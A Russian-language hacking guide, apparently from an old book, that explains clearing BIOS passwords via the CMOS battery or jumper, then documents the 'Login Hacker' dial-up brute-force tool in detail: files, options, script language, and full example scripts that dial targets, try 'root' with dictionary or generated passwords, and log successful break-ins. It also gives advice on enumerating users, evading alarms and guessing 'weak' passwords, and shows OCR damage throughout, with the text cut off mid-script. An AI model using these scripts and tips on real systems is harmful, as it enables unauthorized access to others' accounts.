Каждый BIOS где-то хранит информацию о пароле. Если вы обратитесь к машине после того, как она успешно загрузилась, то сможете просмотреть пароль. Для этого вы должны или сами знать адрес памяти, где пароль сохранен, и формат, в котором пароль сохранен, или иметь соответствующую программу.

Самые простые программы-взломщики паролей BlOS'a работают под AMI BIOS. Некоторые из них отображают пароль AMI BIOS открытым текстом, другие — в кодах ASCII, третьи — в scan codes. Это зависит не только от взломщика, но также и от версии AMI BIOS.

Чтобы получить пароли AMI BIOS, обратитесь к ftp.oak.oakland.edu (/simtel/msdos/sysutil/).

Если после включения компьютера вы не можете обратиться к системе, то до пароля все равно можно добраться. Пароль хранится в CMOS-памяти, которая постоянно поддерживается (даже в то время как PC выключен) маленькой батарейкой, находящейся в материнской плате. Если удалить эту батарейку, вся информация CMOS будет уничтожена, и вы для того, чтобы пользоваться компьютером, должны будете заново ввести установки CMOS. Хозяин машины или ее пользователь наверняка будут сильно встревожены, когда обнаружат, что пароль BlOS'a был удален.

В некоторые материнские платы батарейка впаяна, и ее трудно удалить. В таком случае задействуйте следующий вариант. Найдите на «маме» джампер, контролирующий пароль BlOS'a. Если у вас есть документация на плату, то проблем с определением джампера у вас не будет. Если нет, то посмотрите внимательно — этот джампер может быть как-то помечен. Если же вы абсолютный стопроцентный неудачник, и ни одна из возможных подсказок не срабатывает, то положитесь на свою интуицию и постарайтесь догадаться, какой же'джампер вам нужен. Обычно он находится около батарейки и стоит особняком.

Взлом систем через Login Hacker

Эта большая и весьма гибкая программа предназначена для взлома многих систем. Чтобы проникнуть в систему, вы можете использовать три прилагаемых к программе файла-словаря, а также Brute Force Generator.

Программа Login Hacker также может использоваться системными администраторами для проверки их систем на вшивость. Авторы этой программы предостерегают вас: не стоит пользоваться этим софтом в преступных целях, отвечать перед законом будете только вы сами. Но, с другой стороны, если вы напишите хороший скрипт (сценарий), автор этой программы надеется, что вы пришлете исходник по адресу: vh@campus.de.

Конечно, большинство систем находится под строгим наблюдением и многие терпят неудачу при попытках регистрации (срабатывает система защиты, тревога и новичок получает путевку в не столь отдаленные места). Многие серверы бьют тревогу уже после десяти неудачных попыток зарегистрироваться и, как правило, системный администратор знает что делать дальше. Впрочем, в Unix имеются некоторые дыры, позволяющие подбирать пароль и имя пользователя практически без срабатывания системы защиты сервера, то есть в конце-концов вы входите в систему. Для этого вам нужен отработанный в интерактивном режиме скрипт и знание некоторых команд Unix.

Эту программу вы можете эффективно использовать в старых телекоммуникационных системах, в которых число попыток зарегистрироваться неограниченно.

Для чего нужен взлом? Конечно, для того, чтобы войти в систему. С другой стороны, автор этой программы запрещает пользоваться ей для получения контроля над всей системой. Эта программа предназначена прежде всего для тех, кто хочет получить только один экаунт. Если его зарубят, вы можете снова воспользоваться этой программой. Только для этого. Никакого криминала.

Многие пароли подбираются легко. Это относится к паролям так называемых средних пользователей. Подбирать пароль соответствующий экаунту системного администратора весьма-весьма чревато. Например, в Unix при этом срабатывает специальная система защиты и возникает сообщение об ошибке (auth.crit): CRITICAL. В системах NetWare подобная система начинает функционировать уже после неудачных регистрации. Помните, что практически все системы позволяют регистрироваться в качестве системного администратора только с той консоли, которая принадлежит серверу с главной системой. Поэтому никогда не взламывайте роотуров, системных администраторов, крутых менеджеров и других сетеподобных личностей. После того, как вы войдете в систему, последняя станет весьма уязвимой. Попробуйте получить текстовой файл с описанием модернизации сервера, затем узнайте какие имеются дырки. Если возникнут проблемы, попытайтесь получить помощь у знакомого вам хакера.

Каких пользователей можно легко взламывать? Как правило, пароли женщин подбираются легче (они обычно используют гостевую систему регистрации), чем пароли мужчин. Попробуйте узнать настоящее имя пользователя, а уже затем подобрать его логин, затем любые женские имена, слова из жаргона футболистов, цифры 123, слова типа «secret». В системах Unix для того, чтобы узнать логин пользователя, можно воспользоваться командой finger или через команду telnet воткнуться в smtp-порт и получить полные имена пользователей.

Обычно, когда осуществлена связь с запаролированной системой по телефонной линии, выводится приглашение «PASSWORD:» или вообще экран оказывается пустым.

Важно: Достаточно легко взломать так называемые Silent Carriers. Делается все посредством скрипта программы Login Hacker.

Файлы программы

LOGINH.EXE

Программа Login Hacker.

LH-COMP.EXE

Компилятор для скриптов.

ХООХЕ

Драйвер Fossil. Используйте этот драйвер при выполнении программы. Загружается драйвер так: ХООХЕ Е 2

FILEJD.DIZ

Краткая информация о программе.

HISTORY.DOC

Библиография программы.

LOGINH.DOC

Документация.

SCRIPT.DOC

Документация по скриптам.

RESULT.DOC

Результат в виде кодов, полученный после выполнения Login Hacker.

UPDATE.DOC

Информация о том, как можно обновить программу.

VH_BASE.DIC

Основной словарь.

LH&SCAVE,TXT

Пример скрипта, который используются вместе с Scavenger Dialer.

THC&SCAV.SCR SCAVENGER

Пример скрипта, который нужен скрипту LH&SCAVE.TXT.

REBREAK.SCR

Пример Scavenger-скрипта. Он нужен для скрипта LH&SCAVE.TXT.

HANGUP.SCR

 Пример скрипта, который нужен скрипту LH&SCAVE.TXT.

PICKUP.SCR

Пример скрипта, который нужен скрипту LH&SCAVE.TXT.

THC-LH_1.TXT

Первый пример, показывающий применение языка скриптов.

THC-LH_2.TXT

Второй пример, показывающий применение языка скриптов.

DEC-SERV.TXT

Хорошо опробованный скрипт (автор: Тгоп).

PASSCODE.TXT

Другой скрипт (автор: Mind Maniac).

THC.NFO

Очень важно! Все, что касается известного сообщества.

LORE.COM

Исполняемый скрипт для LORE BBS (автор: Plasmoid).

LOGINH.CFG

Конфигурационный файл.

L0GINH.LOG

Созданный конфигурационный файл. Если конфигурационный файл уже существует, то все данные будут добавлены в его конец. Этот файл может быть определен в соответствующем скрипте или через саму программу в Hacking Setup.

LOGINH.SCR

Скрипт, созданный компилятором LH-COMP.EXE. Только такие скрипты могут быть загружены в Login Hacker.

LOGINH.HCK

Если произошло вынужденное прерывание программы, то создается этот файл с подобным расширением. Это файл данных указывает на установки соответствующие первоначальным данным словаря Brute Force Generator. Если снова произошел сбой, то программа выдаст сообщение с запросом о том, нужно ли использовать данные из этого файла. Это дает вам возможность прервать сессию и использовать предыдущие данные в новой атаке. Помните, что этот файл не является скриптом. Это файл регистрации.

Если вы записываете в этот файл данные, полученные от другой атаки, программа все равно попросит вас использовать только данные предыдущей атаки.

Команды и параметры

Первая и самая главная команда программы Login Hacker со всеми возможными параметрами выглядит так:

LOGINH.EXE [scriptfile]/[anything] [-Auto] [-Shh:mm]  [Ehh:mm]

[scriptfile]

Автоматически загружает скомпилированный скрипт scriptfile и ожидает ввода ключа для загрузки.

[anything]

Если этот параметр не есть существующий файл, то программа запускается без демонстрационных сообщений.

[-Auto]

Этот параметр загружает скрипт без дополнительного ключа.

[-Shh:mm]

Начальное время, то есть пошла атака.

[-Ehh:mm]

Время, в течение которого происходило сканирование.

[-Т]

Запуск скрипта в режиме проверки. То есть скрипт не загружается в модем.

[-D]

Активизация режима отладки. В этом режиме вы можете выбрать, какую команду нужно выполнять дальше.

Вторая, не менее важная команда программы Login Hacker со всеми возможными параметрами выглядит так:

LH-COMP.EXE [scriptfile]

[scriptfile]

Файл, который будет подвергнут процедуре компиляции.

Использование Login Hacker

Имеется пять опций, непосредственно влияющие на запуск программы:

L

Загрузка откомпилированного скрипта и начало атаки.

S

Настройка модема и других основных параметров программы.

Т

Терминальный режим.

I

Некоторая информация.

Q

Выход.

Экран в интерактивном режиме

Речь идет о том моменте, когда произошла загрузка и запустился скрипт. Все, что идет из модема, выглядит на вашем экране символами белого цвета. Все, что записывается в файл регистрации, выглядит на вашем экране темно-синими символами. Каждое сообщение системы, в том числе CONNECT, ALARM, HANGUP и ERROR должно отображаться синим цветом. Все вышесказанное справедливо лишь в том случае, если вы активизировали опцию Print Logoutput to Screen too.

Горячие клавиши в режиме On-line

ESC

Пауза или выход из меню.

F1

Подсказка.

ALT-B

Так называемая базовая клавиша. Позволяет спрятать экран.

ALT-C

Очистка экрана.

ALT-D

Включить или выключить режим отладки.

ALT-H

Вызвать меню HangUp.

ALT-I

Отобразить на экран статистику иругую дополнительную информацию.

ALT-J

Прыгнуть в DOS (не пользуйтесь этой командой в бета-версиях).

ALT-L

Особое меню регистрации.

ALT-T

Загрузить терминальный режим. В этом режиме экран зависает, система находится под вашим контролем. Вы можете произвести идентификацию посредством любой из вышеописанных клавиш (кроме ESC). Что выйти из терминального режима, нажмите ALT-T или ALT-X.

Описание языка скриптов

Скрипты — это изюминка Login Hacker. Поэтому, если вы научитесь писать хорошие скрипты, то сможете взломать практически любую систему. Конечно это не относится к новичкам или тем хакерам, которые никогда не программировали даже на Бэйсике.

Скрипт должен пройти через компилятор, который проверяет его на вшивость. Поэтому вы можете быть уверены на 99%, что в процессе атаки не произойдет сбоя по вине плохого скрипта.

Итак, поехали.

Все, что начинается с точки с запятой — комментарии. Все, что начинается с двоеточия — переход на следующую команду.

Четыре строки, начинающиеся с символа # определяют операторы, с которых начинается специальная часть скрипта.

Оператор #DEFINE определяет переменную.

Оператор #NOCARRIER осуществляет автоматический возврат в программу в случае аварийного прерывания сессии, то есть без команды hangup.

Оператор #START активизирует загрузку скрипта.

Оператор #END заканчивает выполнение скрипта.

Все переменные являются необязательными. Исключение составляют переменные logfile и phone_nr. Вы не можете определять какие-либо переменные, за исключением тех, которые описаны ниже.

LOGFILE=FILENAME

Определить файл регистрации и место на диске для этого файла. Это важная переменная используется при написании любого скрипта.

Например:

L0GFILE=C:\0UTPUT\NY-SYS5.LOG

PHONE_NR=NUMBER

Эта переменная используется вместе с командой DIAL. Ее тело может состоять как из цифр, так и из букв. Это вторая переменная, которую всегда используют при написании скриптов.

Например:

PH0NE_NR=1-800-WH0-CARES   .

INIT_MODEM=STRING

Если ваш модем должен работать в режиме Pulse Dialing, то поместите перед телефонным номером аргумент Р. Если же ваш модем не может инициализировать строковые данные, поместите перед соответствующим телефонным номером команду AT (если эта команда отсутствует в Hacker Setup).

Например:

INIT_MODEM=Z

(здесь также может стоять аргумент AT Z)

INIT_DATA=STRING

Инициализация каналов передачи данных, в том числе стоповых битов и битов четности. Переменная используется в том случае, если соответствующие параметры отсутствуют в Hacker Setup. В общем случае аргументами этой переменной являются наборы символов 8N1 и 7Е1, то есть аргумент всегда должен состоять из трех символов. Первый символ — это цифры 7 или 8, являющиеся битами данных. Второй символ может быть записан как Р (контроль по нечетности), Е (контроль по четности) или N (не контролировать биты данных). Третий символ соответствует ситуации, когда на первый стартовый бит налагается первый стоповый бит:

7/8+E/P/N+1/2.

DIAL_TRIES=NUMBER

Эта переменная определяет количество попыток набора номера в диапазоне от 0 до 65535. Ноль соответствует бесконечному набору номера.

Если номер набран, загружается HANGUP и остальная часть скрипта.

Например:

DIAL_TRIES=3

Standard  :   0

Важно: Если эта переменная отсутствует в скрипте, то будут использованы установки соответствующие файлу LOGINH.CFG.

LOGIN_TRIES=NUMBER

Эта переменная определяет количество попыток входа в систему в диапазоне от 0 до 2300000000. Ноль соответствует неограниченной попытке зарегистрироваться. Если в файле словаря будет достигнут так называемый конец кадра (EOF), то скрипт автоматически повесит трубку и прекратит сессию. Время, в течение которого будет осуществляться подбор регистрационных данных зависит от команд прицепки SEND_NEXT_DIC, NEXT_DIC или им аналогичных для словаря Brute Force Generator.

Например:

LOGIN_TRIES=0

Standard  :   0

Важно: Если эта переменная отсутствует в скрипте, то в атаке будут использованы установки соответствующие файлу LOGINH.CFG.

DIC(NUMBER)=FILENAME

Определить словарь, который будет использован соответствующим скриптом. Аргумент DIC указывает на существующие файлы словарей. Вы можете прицепить к скрипту от одного до трех словарей. Используйте для этого команды Send_Next_DIC (I), Send_DIC (1) и Next_DIC (I).

Например:

DIC(1)=C:\HACKING\DICTIONA.RY\BAD_PWS.DIC

FROM_DIC(NUMBER)=STRING

Определить слово, начиная с которого можно использовать словарь в скрипте.

Например:

FROM_DIC(1)=Tracy

BRUTE(NUMBER)-STRING,NUMBER,NUMBER,NUMBER

Определить словарь Brute Force Generator для использования в скрипте. Brute Force Generator весьма гибок. Четыре параметра словаря Brute Force Generator разделены запятой. Ниже описывается приемлемая спецификация этих параметров.

1

·         а — буквы нижнего регистра.

·         А — буквы верхнего регистра.

·         1 — цифры.

·         $ — спецсимволы.

·         ^ — так называемые контролируемые символы.

·         Любые синонимы ASCII.

2

Этот параметр сообщает скрипту какое количество различных символов, соответствующих параметру 1 необходимо этому скрипту.

Каждое сгенерированное слово соответствующее параметру 1 всегда имеется в таком же слове соответствующим параметру 2. Символ верхнего регистра и один номер допустимы. Величина соответствующая нулю неприемлема.

3

Сообщает скрипту возможную минимальную длину для символов пароля, подобранного при использовании словаря Brute Force Generator.

4

Возможная максимальная длина для символов пароля, подобранного при использовании словаря Brute Force Generator.

Важно: Минимальная длина символов равна 1, максимальная соответствует. 12.

Помните, что вы можете использовать в атаке до трех словарей Brute Force Generator. Используйте для этого великолепные команды привязки Next_Brute(l), Send_Next_Brute(l) и Send_Brute(l).

Например:

BRUTE(1)=a,1,1,6       .

В этом примере используется первый параметр Brute Force Generator со следующими данными: проверять только символы нижнего регистра, предположить, что при подборе пароля в словаре присутствует хотя бы один действительный символ, минимальная длина регистрационного слова равна единице, максимальная — шести.

FROM_BRUTE(number)=STRING

Начать инициализацию со словарем Brute Force Generator. При этом важно следующее: если инициализация началась с четвертой буквы, а вы просматриваете диапазон от 1 до 8 буквы, то диапазон от 1 до 3 будет игнорироваться, то есть сначала идет подбор аааа, затем aaab, затем ааас и т.д.

Например:

FR0M_BRUTE(1)=2527

Секция #NOCARRIER

Это будет выполняться всякий раз, когда вы не используете команду HANGUP. Если в скрипте отсутствуют операторы GOTO (*START) или GOTO (1), то дальше он выполняться не будет. Это означает, что вы снова должны набрать модемный номер доступа к системе. Поэтому проверьте установки в DIALTRIES.

Секция #START

В этой важной секции описываются операторы, которые в дальнейшем будут ломать систему.

LOG(STRING)

Команда LOG() записывает в файл регистрации некоторую информацию. Это может быть любой текст, переменные, перед которыми всегда должен стоять знак $ (знак доллара), а также пробелы между словами. В конец строки каждая команда LOG() автоматически печатает возврат каретки.

Примеры:

LOG(Beginning on $DATE * $TIME)

Будет выведено следующее:

"Beginning on 24-12-96 * 23:00"

LOG_STRING)

Этот пример аналогичен вышеприведенному, за исключением того, что после текста отсутствует возврат каретки.

:NUMBER

Каждая линия, начинающаяся с: (двоеточия) маркируется оператором GOTO. Вы можете использовать 240 маркировок в диапазоне от 1 до 240. Другие номера неприемлемы. Переход к нужному маркеру осуществляется командами передачи управления GOTO, GOSUB, CHECK4OUTPUT и CHECK4CARRIER.

Например:

:1

В этом примере на соответствующую строку выполняется переход к точке с номером 1.

GOTO(NUMBER)

Передать управление на маркировку перехода. Вы можете также осуществить переход командами #START, #NOCARRIER и #END. .

Например: GOTO(#END) (выполнение скрипта завершено).

GOSUB(NUMBER)

С командой подстановки GOSUB вы осуществляете переход к следующей маркировке. Команда GOSUB, как правило исполняется уже после перехода на следующий маркер, то есть в тот момент, когда команды GOSUB и RETURN столкнутся между собой. Обратите внимание, что вот такая команда невозможна: GOSUB(#END).

Например:

G0SUB(4)

RETURN

Это так называемая команда выхода из подпрограммы. Используя эту команду вы можете возвратиться к местоположению последней выполненной команды GOSUB и продолжить обычное выполнение скрипта. Если в буферном регистре команда RETURN сталкивается с несуществующим начальным адресом GOSUB, то она будет игнорироваться. В одном буферном регистре вы можете иметь до 255 подстановок GOSUB.

Например:

RETURN

CHECK4CARRIER(NUMBER)

Проверка модема на соединение с линией, то есть проверка на несущую частоту. Команда будет выполняться в случае отсутствия перехода к указанной маркировке (переход соответствует команде GOTO). Если переход обнаружен, то устанавливается внутреннее соединение с переменной TRUE для проверки на NO_CARRIERS. Вы можете также осуществлять процедуры перехода к *NOCARRIER, *START и *END. Также возможно осуществить проверку модема только на ON или OFF. Если команда CHECK4CARRIER(ON) выполнена с переходом к маркеру, отмечающему обнаружение линии, и, если представлен NOT, то управление передается на *NoCarrier. Эта команда полезна только в том случае, когда вы оказываетесь на CHECK4CARRIER(OFF) и не хотите использовать команду DIAL, чтобы соединиться с удаленной системой (позвольте набрать номер SCAVENGER DIALER).

Примеры:

CHECK4CARRIER(#N0CARRIER)

CHECK4CARRIER(5)

CHECK4CARRIER(0N)

CHECK4CARRIERC0FF)

CHECK40UTPUT(NUMBER)

Это будет выполнено подобно нижеописанной функции ALARM:. Если выходной сигнал (OUTPUT) модема обнаружен, то переходы будут осуществляться непосредственно к указанной маркировке. Вы можете также передать управление к *NOCARRIER, *START и *END. Также возможно отключить проверку на OFF, то есть заблокировать указанную проверку выходного сигнала.

Например:

CHECK4CARRIER(#N0CARRIER)

CHECK4CARRIER(5)

CHECK4CARRIER(0FF)

DIAL

Набор номера PHONE_NR. Если с системой нет соединения, то сначала в модем будет послана команда: «Повесить трубку!»

Например:

DIAL

HANGUP

Поднять и опустить трубку.

Например:

HANGUP        

WAIT4STRING(NUMBER,STRING,NUMBER,COMMAND,STRING)

В представленном здесь языке скриптов это самая важная команда. После ее выполнения выходной сигнал модема будет находиться в состоянии ожидания. В этот момент должна начаться загрузка специального слова. Если стыковка осуществлена, то скрипт продолжается, если — нет, то после тайм-аута в модем будет отправлена заданная последовательность, затем — вновь тайм-аут и, наконец, идет выполнение крманды.

Важно: Сначала команда WAIT4STRING проверяет текущую строку с представленным словом. Синтаксис:

WAIT4STRING(a,b,c,d,e).

а

Определить тайм-аут в диапазоне от 0 до 255 секунд. Ноль соответствует неограниченному ожиданию, то есть ждать до тех пор пока не наступит так называемый TOTAL TIMEOUT (скрипт переходит в секцию #NOCARRIER в том случае, если данные не поступают из модема в течение пяти минут). Если ничего не получено, то последовательность в потоке данных распознается снова, или в какой-то момент несущая частота объявляется потерянной.

b

Последовательность данных, которая будет послана в модем после тайм-аута.

с

Частота отказов или количество общего времени, в течение которого может выполняться фатальная команда. Диапазон: от 0 до 255 (0=никогда, 1=первый раз).

d

Выполнение специальной фатальной команды. Это могут быть любые команды, исключая: ALARM, WAIT4STRING и IF.

е

Последовательность данных для ожидания. Данные чувствительнык регистру.

Например:

WAIT4STRING(15,^M,2,G0T0(1),ogin:)

В этом примере происходит ожидание последовательности ogin: в течение 15 секунд. Если стыковка не получилась, а каретка возвращается в модем (^М), то команда снова ждет 15 секунд, пока вновь не наладится стыковка с последовательностью данных ogin:.

Как только истекут следующие 15 секунд, вызывается фатальная команда, что означает переход к GOTO с меткой под номером 1.

LOG_SESSION_ON

Начиная с этого пункта, все данные поступающие из модема записываются в файл регистрации.

Например:

LOG_SESSION_ON

LOG_SESSION_OFF

Если содержимое экрана записано в файл регистрации, то к этому пункту больше не будет обращений.

Например:

LOG_SESSION_OFF

SEND(STRING)

Команда SEND передает последовательность данных в модем. Через эту команду вы можете пересылать в модем переменные со знаком $. В конец последовательности передается возврат каретки. Если последовательность данных не задана, то сразу осуществляется переход на возврат каретки.

Например:

SEND(echo Hacked you system Time: $TIME - Date: $DATE >

HACKED.TXT)

В данном примере команда SEND посылает в модем следующую строку:

echo HAcked your system Time: 23:00 - Date: 24-12-95 > HACKED.TXT

SEND_()

Эта команда аналогична вышеописанной, но она не посылает в модем символ возврата каретки АМ. Ее можно использовать, если вам нужно загрузить в модем только один символ или командный режим +++.

Примеры:

SEND_(n)

SEND_(+++)

SEND_DIC(NUMBER)

Переслать текущий словарь в модем.

Например:

SEND_DIC(1)

NEXT_DIC(NUMBER)

Переместиться на слово, соответствующее аргументу NUMBER.

Например:

NEXT_DIC(1)

SEND_NEXT_BRUTE(NUMBER)

Используя Brute Force Generator, сгенерировать следующую допустимую последовательность и переслать их в модем.

Например:

SEND_NEXT_BRUTE(1)

SEND_BRUTE(NUMBER)

Переслать в модем текущую последовательность допустимых данных из словаря Brute Force Generator.

Например:

SEND_BRUTE(1)               .

NEXT_BRUTE(NUMBER)

Сгенерировать следующую допустимую последовательность данных из словаря Brute Force Generator.

Например:

NEXT_BRUTE(1)

IF VARIABLE OPERATOR STRING THEN COMMAND

Команда IF первой версии этой программы не очень гибкая. Синтаксис этой команды следующий:

IF <variable><operatorxstring> THEN <command> <variable>

<operator>

Означает равносильность при аргументе =, больше или меньше при аргументах < или > соответственно и переменную содержащую любую последовательность слов при аргументе ~. Переменные и последовательности должны быть дискретными переменными.

<command>

Эта команда выполнится в том случае, если будет соблюдено условие TRUE. Чтобы ее использовать, просмотрите список команд для оператора WAIT4STRING.

Например:

IF STRING~ogin THEN G0T0(3)

To есть, если текущая строка (STRING), содержит дискретную (~) последовательность данных ogin, то идти (GOTO) к маркеру с номером 3.

EXECUTE(STRING)

Выполнить DOS-программу, а затем запустить скрипт. Вы должны включить переменные в выполняемую строку. Вы также должны выполнить соответствующие внутренние команды MS DOS. Помните, что перед переменной может стоять знак $ с возможными пробелами позади и впереди самого знака.

Важно: Если вы хотите запустить программу в то время, когда по вашему скрипту осуществлено соединение, то вы должны использовать драйвер fossil. В противном случае ваш компьютер зависнет. Поэтому запустите ХООХЕ Е 2 перед выполнением программы Login Hacker.

Важно: Чтобы ваша программа не была повреждена, предварительно сохраните ее в каталоге отличным от исходного.

Примеры:

EXECUTE(C:\SB\VPLAY C:\SB\VOC\HACKED.VOC)

EXECUTE(COPY $LOGFILE C:\HACKED)

ALARM(STRING,COMMAND)

Опасно нажимать на спусковой крючок! Если на удаленном компьютере сработала система защиты, то вы будете активны до тех пор, пока не выполниться эта команда.

STRING

Последовательность, для которой осуществляется поиск данных с их последующей передачей в модем.

COMMAND

Эта команда будет выполнена после стыковки. Чтобы ее использовать, просмотрите листинг команд для WAIT4STRING. Примените эту команду в том случае, например, если вы взломали BBS, а сисоп вас раскусил и задает глупые вопросы. После этой команды вы автоматически прервете соединение и остановите выполнение скрипта.

Например:

ALARM(chat,GOTO(#END))

SET VARIABLE=STRING

Этой командой вы определяете переменную в секции #START или #NOCARRIER. Если переменная является статической переменной, то вы должны это отметить. Вы должны устанавливать только следующие переменные: STRING, DIAL_TRIED, LOGIN_TRIED, S_TMP и D_TMP.

Например:

SET D_TMP=3

Определить статическую переменную D_TMP в качестве 3.

INC(DIGIT.VARIABLE)

Увеличить число указанной переменной на 1. Эта команда будет выполнена лишь в том случае, если переменная после дополнения не находится в указанном диапазона.

Имеют силу следующие команды:

·         DIAL_TRIES

·         DIAL_TRIED

·         LOGIN_TRIES

·         LOGINJTRIED

·         D_ТМР.

Например:

INC(D_TMP)

DEC(DIGIT_ VARIABLE)

Уменьшить число указанной переменной на 1. Эта команда будет выполнена лишь в том случае, если переменная после вычитания не будет находиться вне указанного диапазона.

Имеют силу следующие команды:

·         DIAL_TRIES

·         DIAL_TRIED

·         LOGIN_TRIES

·         LOGIN_TRIED

·         D_TMP.

Например:

DEC(D_TMP)

WAIT(NUMBER)

Ожидать до тех пор, пока идут секунды определенные аргументом NUMBER. Аргумент NUMBER соответствует любому числу в диапазоне от 1 до 65535.

Например:

WAIT(10) (десять секунд)

WAIT_(NUMBER)

Ожидать до тех пор, пока идут миллисекунды, определенные аргументом NUMBER. Аргумент NUMBER соответствует любому числу в диапазоне от 1 до 65535.

Например:

WAIT(500)  (полсекунды)

ВЕЕР

Создает сигнал, похожий на легкий звук бибикалки!

Переменные и управляющие символы

Речь идет о переменных, которые могут быть использованы в командах SEND() или LOG(). Как уже отмечалось, печатать переменных в модем или файл регистрации задается символом $ (доллара), поставленным перед соответствующей переменной, и пробелами. Вы можете использовать #DEFINE любые специфические переменные. Вам их нужно только определить.

STRING

Символы пересылаются из модема в последнюю строку.

STRING2

Последние 250 символов отправляются из модема.

DIAL_RIED

Фактические попытки набора номера.

LOGIN_TRIED

Фактические попытки получить имя и пароль.

TIME

Действительное время в часах и минутах (двоеточие пропускается).

Например, ТIMЕ=1505 означает 15:05.

DATE

Текущая дата в формате MMDD. Например, DATE=503 означает 3 мая.

DIC(1)

Текущий загруженный словарь 1.

BRUTE(2)

Текущая строка словаря Brute Force Generator 2.

S_TMP

Переменная строка. Вы можете ее использовать, как вам нравится.

D_TMP

Переменная для цифр. Вы можете ее использовать, как вам нравится.

В командах IF и SET вы можете использовать исключительно вышеописанные переменные. Переменные из #DEFINE исключаются. Только статические переменные и константы приемлемы для IF!

Не стоит также использовать знак $ перед переменной. Этот знак допустим только в командах SEND, LOG и WAIT4STRING.

Например:

IF TIМЕ>1215 THEN GOTO «END (отсоединиться после 12:15).

L0G($DIC(3))

SEND($S_TMP)

Теперь относительно спецсимволов. Вы можете записывать любые управляющие символы вместе с командами LOG, SEND или WAIT4STRING через знак ^ (шапочка). Это означает, что вы можете ввести, например или написать ^^... окей?, или использовать любые конструкции от до ^Z плюс ^[ ^\ ^] и ^^.

Например:

SEND_("D)

#DEFINE  .

<определения>

#NOCARRIER

<некоторые команды>

#START

<ваш алгоритм>

#END

Сообщения об ошибках

Если в процессе компиляции вы получаете сообщение об ошибке, то помните, что в вашем распоряжении имеется файл <name>.BAK. Просмотрите и внимательно изучите содержимое этого файла.

При компилировании скрипта может всплыть только два сообщения об ошибке:

·                     WARNING

Вы что-то не так скомпилировали. Компилятор в любом случае создаст скрипт, который может запуститься без всяких проблем.

Это сообщение, например, может быть выдано, если невозможно найти указанного словаря. Возможно, что вы не полностью подготовили копию.

·                     ERROR

Это критическая ошибка. В какой-то момент компилятор прервал необходимую процедуру завершения. Для исправления этой ошибки, проверьте файл с расширением .ВАК и ваш исходный файл.

Пример стандартного скрипта

#DEFINE

PHONE_NR=,

LOGFILE=lh&scave.log

DIC( 1 )=d:\p roject\hack\word\badpws. die

; задайте корректный путь к вашему словарю

#NOCARRIER

IF S_TMP=DEFINE THEN EXECUTE(scavenge.exe /nooutput /s hangup.scr)

LOG(Carrier lost on $DATE at $TIME)

LOG()

G0TO(#START)

#START

SET S_TMP=UNDEFINE

;SET S_TMP=DEFINE

HANGUP

LOG_SESSION_ON

SET STRING2=

IF S_TMP=DEFINE THEN EXECUTE(scavenge.exe /nooutput /s pickup.scr)

IF S_TMP=UNDEFINE THEN SEND(AT H1)

EXECUTE(scavenge.exe /nooutput /s thc&scav.scr)

: 111

SEND(ATD)

SET D_TMP=0

:112

WAIT(1)

INC(D_TMP)

IF D_TMP>50 THEN G0T0(99)

CHECK4CARRIER(112)

SEND()

; послать возврат каретки после соединения

:1

WAIT(1)

IF STRING2-assw THEN G0T0(2)

GOTO(1)

:2

SEND_NEXT_DIC(1)

WAIT(2)

IF STRING2"ncorr THEN G0T0(3)

G0T0(50)

:3

SET STRING2=

:4

WAIT(1)

IF STRING2~assw THEN G0T0(5)

GOT0(4)

:5

SEND_NEXT_DIC(1)

WAIT(2)

IF STRING2~ncorr THEN G0T0(6)

GOT0(50)

:6

SET STRING2=

:7

WAIT(1)

IF STRING2~assw THEN G0T0(8)

GOTO(7)

:8

SEND_NEXT_DIC(1)

WAIT4STRING(10,, 1,G0T0(50), ncorr)

GOTO(99)

:50

BEEP

BEEP

BEEP

LOG(--- ------      )------ -------------          )

LOG($DATE $TIME)

LOG()

LOG(PASSWORD:   $DIC(D)

LOG()

GOTO(150)

:99

CHECK4CARRIER(OFF)

IF S_TMP=UNDEFINE THEN GOTO(#START)

EXECUTE(scavenge.exe /s rebreak.scr)

; создание скрипта для перенабора номера и дозвона до цели

GOTO(111)

:150

IF S_TMP=DEFINE THEN EXECUTE(scavenge.exe /nooutput /s hangup.scr)

GOTO(#END)    

#END

 

Первый пример скрипта

Системный дескриптор: UNIX на F.

Но вы никогда не должны это делать.

#DEFINE

LOGFILE=C:\OUTPOT\NY-SYS5.LOG

PHONE_NR=I dont tell you  ;)

DIAL_TRIES=3

LOGIN_TRIES=O

DIC(1)=C:\HACKING\DICTIONA.RY\BAD_PWS.DIC

#NOCARRIER

BEEP

BEEP

BEEP

LOG(NO CARRIER)

LOG(ON $DATE $TlME)

LOG(AT $DIC(1))

LOG()

GOTO(#START)

#START

LOG(---------- -----------)----- --------------    )

LOG(TARGET : $PHONE_NR ON $DATE - $TIME)

LOG()

:1

LOG(Dialing ...)

DIAL

LOG($STRING)

LOG_SESSION_ON

SEND()

SEND()

WAIT4STRING(15,^M,4,G0T0(1),name)

SEND(   )

L0G_SESSI0N_OFF

:2

SEND(CONNECT HACK.THIS.SYSTEM.EDU)

:3

WAIT4STRING(30,^C,1,G0T0(2)Iogin:)

SEND(root)

WAIT4STRING(20,^D,1,G0T0(2),assword:)

SEND_NEXT_DIC(1)

IF STRING~ogin: THEN G0T0(3)

IF STRING"refused THEN G0T0(2)

LOG()

LOG($STRING)

LOG()

L0G(!!!!! WE GOT THROUGH !!!!!!)

L0G(login : root)

LOG(Password : $DIC(1))

LOG()

BEEP

BEEP

BEEP

BEEP

BEEP

HANGUP

G0T0(#END)

#END

 

Второй пример скрипта

#DEFINE

INIT_M0DEM=AT&N15

INIT_DATA=7E1

LOGFILE=C:\0UTPUT\TELEK0M4 .LOG

PHONE_NR=I dont tell you ;)

DIAL_TRIES=3

LOGIN_TRIES=O

BRUTE(1)=1,1,1,12

#NOCARRIER               

BEEP

BEEP

BEEP

LOG(NO CARRIER)

LOG(ON $DATE $TIME)

L0G(AT $BRUTE(1))

LOGO

G0T0(#START)

#START

LOG( ------- ------  -)-------------------------)

LOG(TARGET : $PHONE_NR ON $DATE - $TIME)

LOG()

:1

LOG(Dlaling ...)

HANGUP

DIAL

LOG($STRING)

WAIT4STRING(15,^M,4,G0T0(1),PA)

:2        

SEND_NEXT_BRUTE(1)

WAIT4STRING(3,^M,2,G0T0(3),PA)

G0T0(2)

:3

LOG_SESSION_ON

SEND()

SEND(?)

SEND(HELP)

SEND(HILFE)

LOG()

L0G(!!!!!   WE GOT THROUGH  !!!!!!)

LOG(Password  :  $BRUTE(1))

LOG()

BEEP

BEEP

BEEP

BEEP

BEEP

HANGUP

GOTO(#END)

#END

 

Третий пример скрипта

Этот скрипт может быть использован на некоторых небесплатных телефонных линиях 0130-хххххх.

;  Система требует пароль

